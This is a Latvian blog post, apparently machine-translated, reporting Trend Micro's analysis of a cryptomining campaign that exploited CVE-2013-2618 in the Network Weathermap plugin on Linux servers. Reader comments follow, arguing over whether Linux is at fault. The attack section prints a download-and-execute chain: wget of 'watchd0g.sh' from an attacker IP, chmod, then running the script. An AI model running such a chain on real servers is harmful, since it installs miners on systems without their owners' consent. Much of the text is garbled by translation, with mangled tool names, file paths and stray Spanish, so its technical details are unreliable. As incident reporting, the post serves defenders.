Tas no kriptovalūtas kalnrūpnieks izmantojot attālos datorus bez atļaujas to īpašnieku kļūst par tendenci. Es jau pāris reizes par to runāju šeit, emuārā, par šāda veida situāciju.
Un tas ir tas, ka tas jau ir kļuvis pilnīgi nekontrolējams no brīža, kad kriptonauda ir ieņēmuši diezgan ievērojamu vietu un vērtību, cilvēki ar pietiekamām zināšanām, lai piekļūtu datoriem, kas pārkāpj viņu drošību, ir atlicinājuši laika tērēšanu, meklējot svarīgu informāciju vai bankas kontus, lai iegūtu naudas priekšrocības.
Tā vietā viņi izvēlas vienkāršāko rīcību: pārņemt kontroli pār šīm komandām un apvienot tās kalnrūpniecības tīklā, kā arī veikt citus uzdevumus, ko viņi parasti veic ar robottīklu.
Tādā veidā parasti ir vairāk jūs pārnumurēt, viņi koncentrējas tikai uz tūlītēju naudu, ko tā rada.
Ar gudru izpratni par tirgus tendencēm un pienācīgām zināšanām par kriptogrāfijas tirdzniecību var gūt lielas priekšrocības.
Vai Linux patiešām ir droša sistēma?
Daudziem no mums ir ideja, ka Linux ir gandrīz perfekta droša operētājsistēma, patiesībā tajā joprojām ir daži trūkumi.
Nu irdažas dienas TrendMicro atrada, kurā atklāts jauns trūkums Linux sistēmās, kas hakeriem deva kriptovalūtu ieguves priekšrocības izmantojot Linux serverus un mašīnas.
Paziņojumā caur jūsu emuāru viņi komentēja sekojošo:
Veicot monitoringu, kas saistīts ar reaģēšanu uz incidentiem, mēs novērojām ielaušanās mēģinājumus, kuru rādītājus mēs varējām korelēt ar iepriekšējo kriptovalūtu ieguves kampaņu, kurā tika izmantota JenkinsMiner ļaunprogrammatūra.
Atšķirība: šīs kampaņas mērķis ir Linux serveri. Tas ir arī klasisks atkārtoti izmantotu ievainojamību gadījums, kurā tiek izmantots novecojis drošības trūkums, kura plāksteris ir bijis pieejams gandrīz piecus gadus.
Šajā laidienā caur jūsu analīzi izdevās identificēt skartās vietnes par šo neveiksmi, ka Tas galvenokārt skar Japānu, Taivānu, Ķīnu, ASV un Indiju.
Uzbrukuma analīze
Izmantojot analīzi Autors: Trend Micro Smart Protection Network mazliet sīkāk par to, kā uzbrucēji izmanto šo trūkumu:
Šīs kampaņas operatori izmantoja CVE-2013-2618, datētu ievainojamību spraudnī Camapi Network Weathermap, kuru sistēmas administratori izmanto tīkla darbību vizualizēšanai.
Kas attiecas uz to, kāpēc viņi izmanto veco drošības kļūdu: Network Weathermap līdz šim ir tikai divas publiski ziņotas ievainojamības, abas no 2014. gada jūnija.
Šie uzbrucēji, iespējams, izmanto ne tikai drošības trūkumu, kuram ir pieejams izmantojums, bet arī plākstera aizkavi, kas notiek organizācijās, izmantojot atvērtā pirmkoda rīku.
Pamatā uzbrukums notiek, izmantojot XSS uzbrukumu:
Neskaidra daļa ir uzbrukuma mērķis, tīmekļa serveris ar portu.
Fails /plugins/weathermap/configs/conn.php ir fails, kas radies ilgstoša XSS uzbrukuma dēļ / plugins / laika karte / php .
Además de savien.php Sākotnēji mēs redzam līdzīgu HTTP pieprasījumu, kas piemērots lapai ar nosaukumu “ atdzesē.php ".
Kriptogrāfijas valūtas ieguves programma tiek izplatīta caur ievainojamību no PHP laika kartes mērķiem, kas ir Linux serveri
Attēlā varat redzēt, kā tiek ģenerēts uzbrukums, un tas ir aprakstīts šādi:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Tas nozīmē nosūtīt norādi, lai lejupielādētu failu ar wget, kas ir utilīta, kuru pēc noklusējuma ir instalējuši gandrīz visi Linux izplatītāji.
chmod 775 watchd0g.sh
padara failu izpildāmu
./watchd0g.sh
Tas, ko tā galu galā dara, ir panākt, lai fails darbotos serverī.
Par laimi, jau ir plāksteris ( CVE-2013-2618 ), kas pieejama kļūmju gadījumā un To var lejupielādēt no šo saiti
Si jūs vēlaties uzzināt vairāk par to šīs neveiksmes gadījumā varat apmeklēt šo saiti.
Būt idiņam nav droši, un, neskatoties uz to, Linux jūs ietaupa.
Drošības ielāpu neatjaunināšana nav Linux vaina. Tā ir vaina, ka daži uzņēmumi, lai ietaupītu naudu, algo idiotus kā sistēmas administratorus
Bet pat tad tas tiek TŪLĪT ATKLĀTS un tiek atrisināts uzreiz, pat tiek publicēti visi tādi nelieli drošības incidenti kā šis.
Un kāda ir Linux vaina, ka tās atjauninājumi netiek lietoti? GNU / Linux izstrādātāji dara savu darbu, izstrādājot risinājumus jaunajām ievainojamībām un padarot tos pieejamus lietotājiem. Ja ārsts izraksta gripas vakcīnu un jūs to nesaņemat, jūs saslimstat un sastingst ... vai tā ir ārsta vaina?
DesdeLinux Tas nav tas, kas tas bija, divi ziņu stāsti pēc kārtas ar divām svarīgām kļūdām:
1. Labākos redaktoros, lai attīstītu, viņi ievieto tādu, kas nav bezmaksas programmatūra, un viņi aizmirst citus, kas ir (tie ir minēti komentāros).
2.- Milzīgas ziņas par vīrusiem, ja tie ietekmē tikai NAV PAPILDINĀTUS serverus. Bet, ja kāds Linux ir atjaunināts pēc noklusējuma gadu desmitiem. Lai liktu bailes, it kā būtu vajadzīgs Windows stila nepieredzējis antivīruss. Šķiet, ka viņi mēģina teikt, ka Linux ir tas pats, kas Windows, nevis tā.
Ja kļūda ir veca un jau ir ielāpīta, tā nav ne ziņa, ne nekas. Nespēlējiet Microsoft un pretvīrusu kompānijas, piemēram, Trend Micro, Norton, Panda vai McAffee, un nesaņemiet algu.
Starp citu, uzņēmumā vairākus gadus mēs izmantojām Trend Micro, un tas bija īsts kartupelis, juceklis, jo tā sistēma teica, ka izpildāmā failā ir vīrusu pēdas (kaut kas tāds, kas varētu būt vīruss, pat ja tas ir nē) un kāpēc tas to noņēma (aizveda to uz direktoriju, lai tas nedarbotos), neļaujot to izmantot, un tam nebija neviena baltā saraksta, kas atbloķētu šo darbību ar drošu izpildāmo failu, kas mums bija jāizmanto . Ej sūdi. Tā bija korporatīvā versija, individuālajai versijai patiešām bija šī baltā saraksta iespēja. Nožēlojams.
Neraksturojiet sevi tik eleganti.
Rakstā ir runāts par drošības caurumu, kas ļauj ievadīt programmu, padarīt to izpildāmu un palaist, kas ir drošības caurums, kas jāizplata katram vīrusam, acīmredzot, lai tas būtu vīruss, kas nepieciešams ievadītās programmas kodā iespēja skenēt datorus tīklā, lai atkārtotu darbību un paškopētu. Viņi to nedara tieši tāpēc, ka operētājsistēmā Linux atklātās drošības caurumus pārklāj drošības plāksteris, un to es domāju ar atšķirību starp Windows un Linux, jo antivīruss nav vajadzīgs, bet gan, lai novērstu šo caurumu. Sistēmā Windows tas ir grūtāk vairāku iemeslu dēļ: 1. - faili var kļūt izpildāmi, vienkārši paplašinot tos, novēršot soli to ieviešanai skartajā datorā. 2.- Lietotāji pastāvīgi instalē apšaubāmas izcelsmes programmas, jo tās ir īpašumtiesības un tām jābūt bez maksas (es nesaku neko tādu, ko mājas ekonomikai būtu iegādāties MS Office, Photoshop, ... vairāk nekā divkāršojot datortehnikas izmaksas). 3.- Agrāk vai vēlāk Windows tiks izskalots, lietotājs to aizved pie kaimiņa, drauga ..., kurš, lai netērētu laiku, visu formatē un instalē Windows Ultimate ar aktivizācijas plāksteri, kas nav atjaunināts vai pats plāksteris ievieto spiegu programmu. Varētu būt, ka tā nav, un tas notiek lieliski, bet var būt, ka tā ir un Windows spiego paroles. Rakstā viņi piemin ievadsistēmu Linux, kuru ietekmē ievainojamība, padarot programmu, kas automātiski skenē tīklu un izmanto to, lai kopētu sevi un palaistu serverī, visvieglāk, tāpēc raksta iemesls ir vissvarīgākais solis jebkuram vīrusam: zinot sistēmas ievainojamību uzbrukumam.
Slikta informācija. Šī nav kļūda Linux, tā ir kļūda PHP APPLICATION, tas ir, tā ir daudzplatforma. Tas pat nav ekskluzīvs tikai sistēmām, kurās darbojas Linux kodols! Bet, pat ja lietojumprogramma nebūtu starpplatforma, tā nebūtu Linux kļūda, tā būtu tikai lietojumprogramma.
Linux kodolam nav mazākās iejaukšanās aizsardzībā pret vairāku vietņu skriptu uzbrukumiem kā šis. Pirms izlikšanas vismaz izmeklējiet Piecas minūtes, jo patiesība, ka ikvienam, kurš kaut ko zina par kaut ko, jūs izskatīsities slikti.